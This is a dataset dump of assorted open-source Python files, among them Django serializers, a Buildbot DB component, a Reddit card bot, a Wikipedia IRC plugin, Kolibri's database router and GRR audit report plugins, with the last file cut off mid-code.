Dataset schema (column: dtype, observed range):
repo_name: string, lengths 6 to 61
path: string, lengths 4 to 230
copies: string, lengths 1 to 3
size: string, lengths 4 to 6
text: string, lengths 1.01k to 850k
license: string, 15 classes
hash: int64, -9,220,477,234,079,998,000 to 9,219,060,020B
line_mean: float64, 11.6 to 96.6
line_max: int64, 32 to 939
alpha_frac: float64, 0.26 to 0.9
autogenerated: bool, 1 class
ratio: float64, 1.62 to 6.1
config_test: bool, 2 classes
has_no_keywords: bool, 2 classes
few_assignments: bool, 1 class

repo_name | path | copies | size | text | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
skyoo/jumpserver | apps/perms/serializers/asset/user_permission.py | 1 | 2769 |
# -*- coding: utf-8 -*-
#
from rest_framework import serializers
from django.utils.translation import ugettext_lazy as _
from assets.models import Node, SystemUser, Asset
from assets.serializers import ProtocolsField
from perms.serializers.asset.permission import ActionsField
__all__ = [
'NodeGrantedSerializer',
'AssetGrantedSerializer',
'ActionsSerializer', 'AssetSystemUserSerializer',
'RemoteAppSystemUserSerializer',
'DatabaseAppSystemUserSerializer',
'K8sAppSystemUserSerializer',
]
class AssetSystemUserSerializer(serializers.ModelSerializer):
"""
    Data structure for the system users of an authorized asset; unlike AssetSerializer, it exposes fewer fields.
"""
actions = ActionsField(read_only=True)
class Meta:
model = SystemUser
only_fields = (
'id', 'name', 'username', 'priority', 'protocol', 'login_mode',
'sftp_root', 'username_same_with_user',
)
fields = list(only_fields) + ["actions"]
read_only_fields = fields
class AssetGrantedSerializer(serializers.ModelSerializer):
"""
    Data structure of an authorized (granted) asset.
"""
protocols = ProtocolsField(label=_('Protocols'), required=False, read_only=True)
platform = serializers.ReadOnlyField(source='platform_base')
class Meta:
model = Asset
only_fields = [
"id", "hostname", "ip", "protocols", "os", 'domain',
"platform", "comment", "org_id", "is_active"
]
fields = only_fields + ['org_name']
read_only_fields = fields
class NodeGrantedSerializer(serializers.ModelSerializer):
class Meta:
model = Node
fields = [
'id', 'name', 'key', 'value', 'org_id', "assets_amount"
]
read_only_fields = fields
class ActionsSerializer(serializers.Serializer):
actions = ActionsField(read_only=True)
# TODO: remove
class RemoteAppSystemUserSerializer(serializers.ModelSerializer):
class Meta:
model = SystemUser
only_fields = (
'id', 'name', 'username', 'priority', 'protocol', 'login_mode',
)
fields = list(only_fields)
read_only_fields = fields
class DatabaseAppSystemUserSerializer(serializers.ModelSerializer):
class Meta:
model = SystemUser
only_fields = (
'id', 'name', 'username', 'priority', 'protocol', 'login_mode',
)
fields = list(only_fields)
read_only_fields = fields
class K8sAppSystemUserSerializer(serializers.ModelSerializer):
class Meta:
model = SystemUser
only_fields = (
'id', 'name', 'username', 'priority', 'protocol', 'login_mode',
)
fields = list(only_fields)
read_only_fields = fields
| gpl-2.0 | -5,017,376,578,356,509,000 | 27.052083 | 84 | 0.632009 | false | 3.787623 | false | false | false |
denny820909/builder | lib/python2.7/site-packages/buildbot-0.8.8-py2.7.egg/buildbot/db/builds.py | 4 | 2932 |
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from twisted.internet import reactor
from buildbot.db import base
from buildbot.util import epoch2datetime
class BuildsConnectorComponent(base.DBConnectorComponent):
# Documentation is in developer/database.rst
def getBuild(self, bid):
def thd(conn):
tbl = self.db.model.builds
res = conn.execute(tbl.select(whereclause=(tbl.c.id == bid)))
row = res.fetchone()
rv = None
if row:
rv = self._bdictFromRow(row)
res.close()
return rv
return self.db.pool.do(thd)
def getBuildsForRequest(self, brid):
def thd(conn):
tbl = self.db.model.builds
q = tbl.select(whereclause=(tbl.c.brid == brid))
res = conn.execute(q)
return [ self._bdictFromRow(row) for row in res.fetchall() ]
return self.db.pool.do(thd)
def addBuild(self, brid, number, _reactor=reactor):
def thd(conn):
start_time = _reactor.seconds()
r = conn.execute(self.db.model.builds.insert(),
dict(number=number, brid=brid, start_time=start_time,
finish_time=None))
return r.inserted_primary_key[0]
return self.db.pool.do(thd)
def finishBuilds(self, bids, _reactor=reactor):
def thd(conn):
transaction = conn.begin()
tbl = self.db.model.builds
now = _reactor.seconds()
# split the bids into batches, so as not to overflow the parameter
# lists of the database interface
remaining = bids
while remaining:
batch, remaining = remaining[:100], remaining[100:]
q = tbl.update(whereclause=(tbl.c.id.in_(batch)))
conn.execute(q, finish_time=now)
transaction.commit()
return self.db.pool.do(thd)
def _bdictFromRow(self, row):
def mkdt(epoch):
if epoch:
return epoch2datetime(epoch)
return dict(
bid=row.id,
brid=row.brid,
number=row.number,
start_time=mkdt(row.start_time),
finish_time=mkdt(row.finish_time))
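# --- Illustrative usage sketch (not part of the original module) ---
# Each method defers its blocking query to the connector's thread pool and
# returns a twisted Deferred, so callers chain callbacks instead of blocking;
# `db` below stands for the master's DBConnector, which exposes this component
# as `db.builds`.
#
#     d = db.builds.getBuild(bid)
#     d.addCallback(lambda bdict: bdict and bdict["number"])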
| mit | -2,494,213,062,618,674,700 | 35.65 | 79 | 0.610846 | false | 4 | false | false | false |
peterhogan/python | timer.py | 1 | 1713 |
from datetime import datetime
from datetime import timedelta
from time import sleep
from time import strptime
from time import strftime
class Timer(object):
now = datetime.now()
def __init__(self, timevalue):
self.timevalue = timevalue
def inputtime(self):
return datetime.strptime(self.timevalue, "%H:%M:%S %d-%m-%Y")
def printtime(self):
print(self.timevalue)
def countdown(self):
diff = self.inputtime() - self.now
return diff
def timediff(self, value):
diff = self.inputtime() - datetime.strptime(value, "%H:%M:%S %d-%m-%Y")
return diff
def delt(self,days,hours,mins,secs):
timedelt = timedelta(days=days,hours=hours, minutes=mins, seconds=secs)
diff = self.now + timedelt
return diff
    def printcountdown(self):
        # countdown() returns a timedelta, which strptime() cannot parse,
        # so take the timestamp of the target time directly instead.
        nowseconds = self.now.timestamp()
        endseconds = self.inputtime().timestamp()
        cntdwn = abs(nowseconds - endseconds)
        return cntdwn
time1 = Timer("17:00:00 12-05-2017")
print(time1.delt(0,8.5,0,0))
print(time1.printcountdown())
'''
def timediff(number):
seconds = round(abs(time() - number)) % 60
mins = str(((abs(time() - number)) / 60) % 60).split('.')[0]
hours = str(((abs(time() - number)) / 3600)).split('.')[0]
return {'s': seconds,'m': mins,'h': hours}
def printdiff(tv):
print("Seconds:", timediff(tv)['s'],
"\tMins:", timediff(tv)['m'],
"\tHours:", timediff(tv)['h'],
end='\r', flush=True)
def countdown(timevalue):
return print(timediff(timevalue))
countdown(100)
'''
| mit | 6,972,669,525,992,226,000 | 25.765625 | 89 | 0.583771 | false | 3.495918 | false | false | false |
camconn/probot | plugins/wikipedia.py | 1 | 7061 |
#!/usr/bin/env python3
# probot - An asynchronous IRC bot written in Python 3
# Copyright (c) 2016 Cameron Conn
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import json
import requests
#import pprint
import ircpacket as ircp
from irctools import require_public
__plugin_description__ = 'Search wikipedia'
__plugin_version__ = 'v0.1'
__plugin_author__ = 'Cameron Conn'
__plugin_type__ = 'command'
__plugin_enabled__ = True
def get_summary(query: str):
'''
Get the short summary for a search term
query - The term to search for.
'''
BASE = 'https://en.wikipedia.org/w/'
PAGEBASE = BASE + 'index.php'
APIBASE = BASE + 'api.php'
SEARCHBASE = APIBASE + '?action=opensearch&search='
#SEARCHBASE = '{}?action=query&list=search&format=json&srsearch='
DISAMBIGCAT = 'Category:All disambiguation pages'
REDIRBASE = APIBASE + '?action=query&titles={}&redirects&format=json'
headers = {'user-agent': 'probot - An IRC Bot (wiki plugin)'}
# TODO: Use https://en.wikipedia.org/w/api.php?action=query&list=search&srsearch=tape&format=json
# TODO: Use https://en.wikipedia.org/w/api.php?action=query&list=search&srsearch=sigkill&srprop=redirecttitle|redirectsnippet|sectionsnippet|snippet&format=json
query = query.replace(' ', '_')
print('new query: {}'.format(query))
# Determine if there's a redirect
# TODO: Handle fragments
# NOTE: Wikipedia better handles searchs with underscores instead of spaces
redir_req = requests.get(REDIRBASE.format(query), headers=headers)
if redir_req.status_code == 200:
redir_info = json.loads(redir_req.text)
if 'redirects' in redir_info['query']:
print('found redirect!')
#print(redir_info['query']['redirects'])
#print(type(redir_info['query']['redirects']))
query = redir_info['query']['redirects'][0]['to']
print('now using {}'.format(query))
elif 'normalized' in redir_info['query']:
print('normalizing query')
query = redir_info['query']['normalized'][0]['to']
print('now using {}'.format(query))
# Get search info to see if anything matches
#search_page = '{0}{1}'.format(SEARCHBASE, query)
#print('search page: {}'.format(search_page))
search_page = SEARCHBASE + query
s_req = requests.get(search_page, headers=headers)
r_list = None
if s_req.status_code == 200:
r_list = json.loads(s_req.text)
#print('r_list:')
#print(r_list)
else: # Some error occurred
return 'Error: Bad status code: {}'.format(s_req.status_code)
#pprint.pprint(r_list)
#Check if article is disambiguation
category_api = APIBASE + """?action=query""" \
"""&titles={}&prop=categories""" \
"""&format=json&continue=""".format(query)
cat_raw = requests.get(category_api, headers=headers)
article_cat = None
try:
article_cat = json.loads(cat_raw.text)
except Exception:
return None
is_disambig = False
if 'query' not in article_cat:
return None
#if len(r_list) < 1:
# return 'There were no results when searching for "{}"'.format(query)
if 'pages' in article_cat['query']:
pageid_cat = list(article_cat['query']['pages'].keys())[0]
if 'categories' in article_cat['query']['pages'][str(pageid_cat)]:
for cat in article_cat['query']['pages'][str(pageid_cat)]['categories']:
if cat['title'] == DISAMBIGCAT:
is_disambig = True
if is_disambig:
if len(r_list[1]) >= 2:
return 'I\'m sorry. Did you mean: {}?'.format(r_list[1][1])
else:
return 'Sorry, you need to be more specific.'
    # If the page doesn't exist
if len(r_list[1]) + len(r_list[2]) + len(r_list[3]) == 0:
return 'Sorry, but I found no pages matching that title.'
page_name = r_list[1][0]
page_loc = None
if len(r_list[3]) > 0:
page_loc = r_list[3][0]
#print(page_loc)
# Get summary of article
summary_api = APIBASE + """?action=query&prop=extracts""" \
"""&explaintext&titles={}""" \
"""&exchars=250&format=json""".format(page_name)
summary_req = requests.get(summary_api, headers=headers)
summary_dict = json.loads(summary_req.text)
pageid_sum = list(summary_dict['query']['pages'].keys())[0]
if pageid_sum:
summary = summary_dict['query']['pages'][pageid_sum]['extract'].rstrip()
#print('summary: ')
#print(summary)
#print('type: {}'.format(type(summary)))
#print('end debug')
# Add a link to to page location if we know it.
if '\n' in summary or '\r' in summary:
summary = summary.replace('\r\n', '\n').replace('\r', '\n')
#print('split:')
#print(summary.split('\n'))
#print('end split')
summary = ' '.join(summary.split('\n'))
if page_loc:
summary = '{} [{}]'.format(summary, page_loc)
return summary
else:
return 'Sorry, but I had an error finding a summary of that page.'
@require_public
def wiki_command(arg, packet, shared):
'''
The wiki command
Usage
:w George Washington
:wiki Monty Python
'''
if len(arg) < 2:
return ircp.make_notice('You need to list something to search', packet.sender)
query = ' '.join(arg[1:])
print('search query: "{}"'.format(query))
summary = get_summary(query)
if summary == '...' or summary is None:
return None
elif isinstance(summary, tuple) or isinstance(summary, list):
output = []
for line in summary:
output.append(ircp.make_message(line.strip(), packet.target))
return output
else:
print('summary: ')
print(summary)
print('that was the last time!')
return ircp.make_message(summary, packet.target)
def setup_resources(config: dict, shared: dict):
shared['help']['wiki'] = 'Search for a term on the English Wikipedia || :wiki <query> || :wiki Linus Torvalds'
shared['help']['w'] = 'Alias to :wiki'
shared['cooldown']['wiki'] = 10
shared['cooldown']['w'] = 'wiki'
def setup_commands(all_commands: dict):
all_commands['wiki'] = wiki_command
all_commands['w'] = wiki_command
| agpl-3.0 | -5,288,311,132,269,801,000 | 34.129353 | 164 | 0.610112 | false | 3.656655 | false | false | false |
ralphiee22/kolibri | kolibri/content/content_db_router.py | 2 | 6821 |
"""
As we store content databases in separate SQLite files per channel, we need dynamic database connection routing.
This file contains a decorator/context manager, `using_content_database`, that allows a specific content
database to be specified for a block of code, as follows:
with using_content_database("nalanda"):
objects = ContentNode.objects.all()
return objects.count()
Thanks to https://github.com/ambitioninc/django-dynamic-db-router for inspiration behind the approach taken here.
"""
import os
import sqlite3
import threading
from functools import wraps
from django.apps import apps
from django.conf import settings
from django.db import DEFAULT_DB_ALIAS, connections
from django.db.utils import ConnectionDoesNotExist
from .errors import ContentModelUsedOutsideDBContext
THREAD_LOCAL = threading.local()
_content_databases_with_attached_default_db = set()
def default_database_is_attached():
alias = get_active_content_database()
return alias in _content_databases_with_attached_default_db
def get_active_content_database(return_none_if_not_set=False):
# retrieve the temporary thread-local variable that `using_content_database` sets
alias = getattr(THREAD_LOCAL, 'ACTIVE_CONTENT_DB_ALIAS', None)
# if no content db alias has been activated, that's a problem
if not alias:
if return_none_if_not_set:
return None
else:
raise ContentModelUsedOutsideDBContext()
# try to connect to the content database, and if connection doesn't exist, create it
try:
connections[alias]
except ConnectionDoesNotExist:
if alias.endswith(".sqlite3"):
filename = alias
else:
filename = os.path.join(settings.CONTENT_DATABASE_DIR, alias + '.sqlite3')
if not os.path.isfile(filename):
raise KeyError("Content DB '%s' doesn't exist!!" % alias)
connections.databases[alias] = {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': filename,
}
# check that the content database is not empty
if not connections[alias].introspection.table_names():
raise KeyError("Content DB '%s' is empty!!" % alias)
# if possible, attach the default database to the content database connection to enable joins
_attach_default_database(alias)
return alias
def _attach_default_database(alias):
"""
Attach the default (primary) database file to the content database connection, if both use sqlite files.
This allows us to do direct joins between tables across the two databases, for efficiently integrating
data from the two sources -- e.g. annotating ContentNodes with progress info from ContentSummaryLogs.
"""
    # the default database can only be attached if it is also backed by a sqlite file
default_db = connections.databases[DEFAULT_DB_ALIAS]
if default_db["ENGINE"].endswith(".sqlite3") and default_db["NAME"].endswith(".sqlite3"):
default_db_path = connections.databases[DEFAULT_DB_ALIAS]["NAME"]
try:
# ensure we're connected to the content database before attaching the default database
if not connections[alias].connection:
connections[alias].connect()
# attach the default database to the content db connection; this allows tables from both databases
# to be used together in the same query; see https://www.sqlite.org/lang_attach.html
connections[alias].connection.execute("ATTACH DATABASE '{}' AS defaultdb;".format(default_db_path))
# record the fact that the default database has been attached to this content database
_content_databases_with_attached_default_db.add(alias)
except sqlite3.OperationalError:
# this will happen if the database is already attached; we can safely ignore
pass
def set_active_content_database(alias):
setattr(THREAD_LOCAL, 'ACTIVE_CONTENT_DB_ALIAS', alias)
class ContentDBRouter(object):
"""A router that decides what content database to read from based on a thread-local variable."""
def _get_db(self, model, **hints):
from .models import ContentDatabaseModel
# if the model does not inherit from ContentDatabaseModel, leave it for the default database
if not issubclass(model, ContentDatabaseModel):
return None
# if the model is already associated with a database, use that database
if hasattr(hints.get("instance", None), "_state"):
return hints["instance"]._state.db
# determine the currently active content database, and return the alias
return get_active_content_database()
def db_for_read(self, model, **hints):
return self._get_db(model, **hints)
def db_for_write(self, model, **hints):
return self._get_db(model, **hints)
def allow_relation(self, obj1, obj2, **hints):
return True
def allow_migrate(self, db, app_label, model_name=None, **hints):
from .models import ContentDatabaseModel
model = apps.get_model(app_label=app_label, model_name=model_name) if model_name else None
# allow migrations for ContentDatabaseModels on non-default DBs, and for others only on default DB
if model and issubclass(model, ContentDatabaseModel):
val = db != DEFAULT_DB_ALIAS
else:
val = db == DEFAULT_DB_ALIAS
return val
class using_content_database(object):
"""A decorator and context manager to do queries on a specific content DB.
:type alias: str
:param alias: The alias for the content database to run queries on.
Usage as a context manager:
.. code-block:: python
from models import ContentNode
with using_content_database("nalanda"):
objects = ContentNode.objects.all()
return objects.count()
Usage as a decorator:
.. code-block:: python
from models import ContentNode
@using_content_database('nalanda')
def delete_all_the_nalanda_content():
ContentNode.objects.all().delete()
"""
def __init__(self, alias):
self.alias = alias
def __enter__(self):
self.previous_alias = getattr(THREAD_LOCAL, 'ACTIVE_CONTENT_DB_ALIAS', None)
set_active_content_database(self.alias)
return self
def __exit__(self, exc_type, exc_value, traceback):
set_active_content_database(self.previous_alias)
def __call__(self, querying_func):
# allow using the context manager as a decorator
@wraps(querying_func)
def inner(*args, **kwargs):
# Call the function in our context manager
with self:
return querying_func(*args, **kwargs)
return inner
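# --- Illustrative usage sketch (not part of the original module) ---
# The router only takes effect once it is listed in Django's DATABASE_ROUTERS
# setting. The dotted path below is inferred from this file's location and the
# model import is an assumption; adjust both to the real project layout.
#
#     # settings.py
#     DATABASE_ROUTERS = ["kolibri.content.content_db_router.ContentDBRouter"]
#
#     # elsewhere, query a specific channel database:
#     from kolibri.content.content_db_router import using_content_database
#     from kolibri.content.models import ContentNode  # assumed location
#
#     with using_content_database("nalanda"):
#         print(ContentNode.objects.count())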
| mit | -6,517,660,795,330,440,000 | 36.070652 | 113 | 0.674681 | false | 4.344586 | false | false | false |
d-schmidt/hearthscan-bot | hearthscan-bot.py | 1 | 7345 |
#!/usr/bin/env python3
import logging as log
import re
import time
from cardDB import CardDB
from constants import Constants
from helper import HSHelper
from praww import RedditBot
import commentDB
import credentials
import formatter
# answer pms of the same user only every x seconds
PM_RATE_LIMIT = 60
def answerComment(r, comment, answeredDB, helper):
"""read and answer a comment"""
cards, answer = helper.parseText(comment.body)
if cards and answer:
if answeredDB.exists(comment.parent_id, cards):
# send pm instead of comment reply
sub = comment.submission
log.info("sending duplicate msg: %s with %s",
comment.author, cards)
header = formatter.createDuplicateMsg(sub.title, sub.permalink)
message = header + answer
r.redditor(comment.author.name) \
.message('You requested cards in a comment', message)
else:
# reply to comment
log.info("replying to comment: %s %s with %s",
comment.id, comment.author.name, cards)
comment.reply(answer)
def answerMention(r, comment, answeredDB, helper):
"""read and answer a mention"""
cards, answer = helper.parseText(comment.body)
if cards and answer:
if not answeredDB.exists(comment.parent_id, cards):
# reply to comment
log.info("replying to comment: %s %s with %s",
comment.id, comment.author.name, cards)
comment.reply(answer)
else:
log.debug("forwarded mention with id: %s", comment.id)
# forward mentions without cards to admin
subject = '${} /u/{} in /r/{}/ "{}"'.format(comment.id, comment.author,
comment.subreddit, comment.submission.title)
r.redditor(credentials.admin_username).message(subject, comment.body)
def answerSubmission(submission, helper):
"""read and answer a submission"""
text = submission.title
if submission.is_self:
text += ' ' + submission.selftext
cards, answer = helper.parseText(text)
if cards and answer:
log.info("replying to submission: %s %s with %s",
submission.id, submission.author.name, cards)
submission.reply(answer)
def answerPM(r, msg, pmUserCache, helper):
""" read and answer a pm """
subject_author = ""
# subreddit mod pm
if msg.subreddit:
author = msg.subreddit.display_name
subject_author += " /r/" + author
if msg.author:
author = msg.author.name
subject_author += " /u/" + author
log.debug("found message with id: %s from %s", msg.id, author)
if msg.author and not msg.distinguished and author in pmUserCache:
log.debug("user %s is in recent msg list", author)
return
if author == credentials.admin_username and msg.subject[:5] == 're: #':
forwardPMAnswer(r, msg)
return
if author == credentials.admin_username and msg.subject[:5] == 're: $':
forwardMentionAnswer(r, msg)
return
pmUserCache[author] = int(time.time()) + PM_RATE_LIMIT
text = msg.subject + ' ' + msg.body
cards, answer = helper.parseText(text)
# some ui and clients do escape the brackets
if re.search(r'\\?\[\\?\[info\\?\]\\?\]', text):
answer = helper.getInfoText(author) + answer
if cards or answer:
if cards:
log.info("sending msg: %s with %s", author, cards)
msg.reply(answer)
else:
# vip tags (mod, admin usw)
if msg.distinguished:
subject_author += " [" + msg.distinguished + "]"
log.debug("forwarded message with id: %s", msg.id)
# forward messages without cards to admin
subject = '#{}{}: "{}"'.format(msg.id, subject_author, msg.subject)
r.redditor(credentials.admin_username).message(subject, msg.body)
def getIdFromSubject(subject):
first_space = subject.find(' ', 6)
slice_to = first_space if first_space > 1 else len(subject)
if slice_to > 5:
return subject[5:slice_to]
def forwardPMAnswer(r, answer_msg):
"""handle messages from bot admin which are answers to
forwarded messages
"""
message_id = getIdFromSubject(answer_msg.subject)
if message_id:
old_message = r.inbox.message(message_id)
if old_message:
log.debug("forwarded answer to message id: %s", old_message.id)
old_message.reply(answer_msg.body)
answer_msg.reply("answer forwarded")
def forwardMentionAnswer(r, answer_msg):
"""handle messages from bot admin which are answers to
forwarded mentions
"""
comment_id = getIdFromSubject(answer_msg.subject)
if comment_id:
src_comment = r.comment(comment_id)
if src_comment:
log.debug("forwarded answer to comment id: %s", src_comment.id)
src_comment.reply(answer_msg.body)
answer_msg.reply("answer forwarded")
def cleanPMUserCache(cache):
""" clean recent user msg cache """
removeUser = []
now = int(time.time())
for user, utime in cache.items():
if now > utime:
log.debug("removing author %s from recent list", user)
removeUser.append(user)
for ku in removeUser:
del cache[ku]
def main():
log.debug('main() hearthscan-bot starting')
# load constant values
constants = Constants()
# init answered comments sqlite DB
answeredDB = commentDB.DB()
# load card DB
url = 'https://raw.githubusercontent.com/d-schmidt/hearthscan-bot/master/data/tempinfo.json'
cardDB = CardDB(constants=constants, tempJSONUrl=url)
# init hs helper for hearthstone stuff
helper = HSHelper(cardDB, constants)
# pm spam filter cache
pmUserCache = {}
def submissionListener(r, submission):
answerSubmission(submission, helper)
def commentListener(r, comment):
answerComment(r, comment, answeredDB, helper)
def mentionListener(r, comment):
answerMention(r, comment, answeredDB, helper)
def pmListener(r, message):
answerPM(r, message, pmUserCache, helper)
def postAction():
cleanPMUserCache(pmUserCache)
cardDB.refreshTemp()
try:
RedditBot(subreddits=credentials.subreddits,
newLimit=250,
connectAttempts=5,
userBlacklist=set(credentials.userBlacklist)) \
.withSubmissionListener(submissionListener) \
.withCommentListener(commentListener) \
.withMentionListener(mentionListener) \
.withPMListener(pmListener) \
.run(postAction)
except:
log.exception('main() RedditBot failed unexpectedly')
finally:
log.warning('main() leaving hearthscan-bot')
answeredDB.close()
if __name__ == "__main__":
log.basicConfig(filename="bot.log",
format='%(asctime)s %(levelname)s %(module)s:%(name)s %(message)s',
level=log.DEBUG)
log.getLogger('prawcore').setLevel(log.INFO)
log.getLogger('urllib3.connectionpool').setLevel(log.INFO)
# start
try:
main()
except:
log.exception('main() failed unexpectedly')
        exit(1)
| mit | 6,084,005,707,293,402,000 | 29.106557 | 96 | 0.618652 | false | 3.884188 | false | false | false
andybalaam/poemtube | server/src/poemtube/api/v1/authentication.py | 1 | 1285 |
import base64
import re
import web
from web import webopenid
known_users = {
"user1": "pass1",
"user2": "pass2",
"user3": "pass3",
}
def unauthorized():
return web.HTTPError(
"401 Unauthorized",
{
'WWW-Authenticate': 'Basic realm="PoemTube"',
'content-type': 'text/html',
}
)
def authenticate_token( db, authentication_token ):
if authentication_token is None:
return None
if authentication_token in db.tokens:
return db.tokens[authentication_token]["user"]
def authenticate_user( db ):
oid = webopenid.status()
if oid:
return oid
authentication_token = web.cookies().get( "authentication_token" )
user_from_token = authenticate_token( db, authentication_token )
if user_from_token is not None:
return user_from_token
auth = web.ctx.env.get( "HTTP_AUTHORIZATION" )
if auth is None:
return None
user, pw = base64.decodestring( re.sub( "^Basic ", "", auth ) ).split( ":" )
if user in known_users and known_users[user] == pw:
return user
else:
        raise unauthorized()
def require_authenticated_user( db ):
user = authenticate_user( db )
if user is None:
        raise unauthorized()
return user
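# --- Illustrative usage sketch (not part of the original module) ---
# A web.py handler would typically call require_authenticated_user() before
# touching the data store; the handler class and `db` object here are
# hypothetical, not part of this module.
#
#     class Poems(object):
#         def POST(self):
#             user = require_authenticated_user(db)
#             # `user` is now a verified username; proceed with the request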
| gpl-2.0 | -796,029,123,556,662,700 | 21.155172 | 80 | 0.61323 | false | 3.735465 | false | false | false |
TheCacophonyProject/Raspberry_Pi_Recorder | CacophonyModules/util.py | 1 | 2242 |
import os
import events
import random
import string
import json
import time
import requests
def make_dirs(dirs):
"""Makes the dirs in the list given"""
try:
for d in dirs:
if not os.path.exists(d):
os.makedirs(d)
except OSError as e:
print(e)
return False
return True
def save_data(data, f = None):
"""Saves the data and recording in the toUpload folder."""
# Make folder where the data and file will be saved.
folder = os.path.join("toUpload", rand_str())
if not make_dirs([folder]):
print("Error with making folder when saving data: "+folder)
return False
# Move recording file, if there is one, into the folder made above.
if f != None:
_, ext = os.path.splitext(f)
os.rename(f, os.path.join(folder, "file"+ext))
# Save data as a json file.
with open(os.path.join(folder, "metadata.json"), "w") as jsonFile:
json.dump(data, jsonFile)
# Make new event
events.new_event(events.DATA_TO_UPLOAD, {"folder": folder})
def rand_str(length = 8):
return ''.join(random.sample(string.lowercase + string.digits, length))
def datetimestamp(t = None):
if t == None:
return(time.strftime(format('%Y-%m-%d %H:%M:%S%z')))
else:
return(time.strftime(format('%Y-%m-%d %H:%M:%S%z'), t))
def timestamp():
return(time.strftime(format('%H:%M:%S')))
def inTimeRange(start, end):
now = time.strftime(format('%H:%M'))
start = int(start.split(":")[0])+int(start.split(":")[1])/100.0 #Change '10:23' into 10.23
end = int(end.split(":")[0])+int(end.split(":")[1])/100.0
now = int(now.split(":")[0])+int(now.split(":")[1])/100.0
if (start < end): # range doesn't pass through midnight.
return (start < now and now < end)
else: # Rnage passes throgh midnight.
return (start < now or now < end)
def ping(config):
result = False
url = config.get('server', 'url')
print("Pinging server")
try:
r = requests.get(url+'/ping')
if r.text == 'pong...':
print('Pong...')
result = True
except:
print("Error with connecting to server.")
result = False
return result
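# --- Illustrative usage sketch (not part of the original module) ---
# inTimeRange() treats a start time later than the end time as a window that
# wraps past midnight, which suits overnight recording schedules:
#
#     inTimeRange("21:00", "05:30")  # True between 9 pm and 5:30 am
#     inTimeRange("09:00", "17:00")  # True only during the day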
| gpl-3.0 | -7,444,512,290,336,446,000 | 28.893333 | 94 | 0.589652 | false | 3.454545 | false | false | false |
pidydx/grr | grr/gui/api_plugins/report_plugins/server_report_plugins.py | 1 | 14271 |
#!/usr/bin/env python
"""UI server report handling classes."""
import operator
from grr.gui.api_plugins.report_plugins import rdf_report_plugins
from grr.gui.api_plugins.report_plugins import report_plugin_base
from grr.gui.api_plugins.report_plugins import report_utils
from grr.lib import config_lib
from grr.lib import events
from grr.lib import rdfvalue
from grr.lib.aff4_objects import users as aff4_users
from grr.lib.flows.general import audit
TYPE = rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER
class ClientApprovalsReportPlugin(report_plugin_base.ReportPluginBase):
"""Given timerange's client approvals."""
TYPE = TYPE
TITLE = "Client Approvals"
SUMMARY = "Client approval requests and grants for the given timerange."
REQUIRES_TIME_RANGE = True
USED_FIELDS = ["action", "client", "description", "timestamp", "user"]
TYPES = [
events.AuditEvent.Action.CLIENT_APPROVAL_BREAK_GLASS_REQUEST,
events.AuditEvent.Action.CLIENT_APPROVAL_GRANT,
events.AuditEvent.Action.CLIENT_APPROVAL_REQUEST
]
def GetReportData(self, get_report_args, token):
"""Filter the cron job approvals in the given timerange."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
AUDIT_CHART,
audit_chart=rdf_report_plugins.ApiAuditChartReportData(
used_fields=self.__class__.USED_FIELDS))
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
rows = []
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if event.action in self.__class__.TYPES:
rows.append(event)
except ValueError: # Couldn't find any logs..
pass
except IOError:
pass
rows.sort(key=lambda row: row.timestamp, reverse=True)
ret.audit_chart.rows = rows
return ret
class CronApprovalsReportPlugin(report_plugin_base.ReportPluginBase):
"""Given timerange's cron job approvals."""
TYPE = TYPE
TITLE = "Cron Job Approvals"
SUMMARY = "Cron job approval requests and grants for the given timerange."
REQUIRES_TIME_RANGE = True
USED_FIELDS = ["action", "description", "timestamp", "urn", "user"]
TYPES = [
events.AuditEvent.Action.CRON_APPROVAL_GRANT,
events.AuditEvent.Action.CRON_APPROVAL_REQUEST
]
def GetReportData(self, get_report_args, token):
"""Filter the cron job approvals in the given timerange."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
AUDIT_CHART,
audit_chart=rdf_report_plugins.ApiAuditChartReportData(
used_fields=self.__class__.USED_FIELDS))
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
rows = []
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if event.action in self.__class__.TYPES:
rows.append(event)
except ValueError: # Couldn't find any logs..
pass
except IOError:
pass
rows.sort(key=lambda row: row.timestamp, reverse=True)
ret.audit_chart.rows = rows
return ret
class HuntActionsReportPlugin(report_plugin_base.ReportPluginBase):
"""Hunt actions in the given timerange."""
TYPE = TYPE
TITLE = "Hunts"
SUMMARY = "Hunt management actions for the given timerange."
REQUIRES_TIME_RANGE = True
USED_FIELDS = [
"action", "description", "flow_name", "timestamp", "urn", "user"
]
TYPES = [
events.AuditEvent.Action.HUNT_CREATED,
events.AuditEvent.Action.HUNT_MODIFIED,
events.AuditEvent.Action.HUNT_PAUSED,
events.AuditEvent.Action.HUNT_STARTED,
events.AuditEvent.Action.HUNT_STOPPED
]
def GetReportData(self, get_report_args, token):
"""Filter the hunt actions in the given timerange."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
